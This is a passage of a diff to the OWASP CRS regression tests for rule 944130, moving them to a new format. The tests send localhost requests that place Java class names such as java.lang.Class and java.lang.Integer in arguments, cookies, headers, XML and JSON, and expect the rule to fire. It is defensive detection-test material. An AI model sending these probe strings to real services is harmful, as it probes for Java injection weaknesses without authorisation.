+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"java.io.StringReader\": \"test\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 265
 desc: "Argument test includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.lang.Class"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-266
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version:
"HTTP/1.0"
+ data: "test=java.lang.Class"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 266
 desc: "Argument name includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.lang.Class=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-267
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.lang.Class=test"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 267
 desc: "Cookie test includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=java.lang.Class
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-268
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+
Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=java.lang.Class
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 268
 desc: "Cookie name includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: java.lang.Class=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-269
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: java.lang.Class=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 269
 desc: "Request header test includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: java.lang.Class
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-270
+ - input:
+
dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: java.lang.Class
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 270
 desc: "XML attribute value includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-271
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 271
 desc: "XML element value includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data:
"java.lang.Class"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-272
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.lang.Class"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 272
 desc: "Nested XML element value includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.lang.Class"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-273
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.lang.Class"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 273
 desc: "Content-Type text/plain includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
-
method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.lang.Class"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-274
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.lang.Class"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 274
 desc: "Content-Type application/json arg value includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"java.lang.Class\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-275
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"java.lang.Class\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 275
 desc: "Content-Type application/json arg name includes keyword java.lang.Class"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept:
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"java.lang.Class\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-276
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"java.lang.Class\": \"test\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 276
 desc: "Argument test includes keyword java.lang.Integer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.lang.Integer"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-277
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.lang.Integer"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 277
 desc: "Argument name includes keyword java.lang.Integer"
 stages:
- -
stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.lang.Integer=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-278
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.lang.Integer=test"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 278
 desc: "Cookie test includes keyword java.lang.Integer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=java.lang.Integer
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-279
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=java.lang.Integer
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 279
 desc: "Cookie name includes keyword java.lang.Integer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: java.lang.Integer=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-280
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: java.lang.Integer=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 280
 desc: "Request header test includes keyword java.lang.Integer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: java.lang.Integer
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-281
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept:
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: java.lang.Integer
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 281
 desc: "XML attribute value includes keyword java.lang.Integer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-282
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 282
 desc: "XML element value includes keyword java.lang.Integer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.lang.Integer"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-283
+ - input:
+ dest_addr:
"127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.lang.Integer"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 283
 desc: "Nested XML element value includes keyword java.lang.Integer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.lang.Integer"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-284
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.lang.Integer"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 284
 desc: "Content-Type text/plain includes keyword java.lang.Integer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.lang.Integer"
- output:
-
log_contains: "id \"944130\""
- - test_title: 944130-285
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.lang.Integer"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 285
 desc: "Content-Type application/json arg value includes keyword java.lang.Integer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"java.lang.Integer\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-286
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"java.lang.Integer\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 286
 desc: "Content-Type application/json arg name includes keyword java.lang.Integer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language:
"en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"java.lang.Integer\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-287
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"java.lang.Integer\": \"test\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 287
 desc: "Argument test includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.lang.Number"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-288
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.lang.Number"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 288
 desc: "Argument name includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept:
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.lang.Number=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-289
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.lang.Number=test"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 289
 desc: "Cookie test includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=java.lang.Number
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-290
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=java.lang.Number
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 290
 desc: "Cookie name
includes keyword java.lang.Number"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
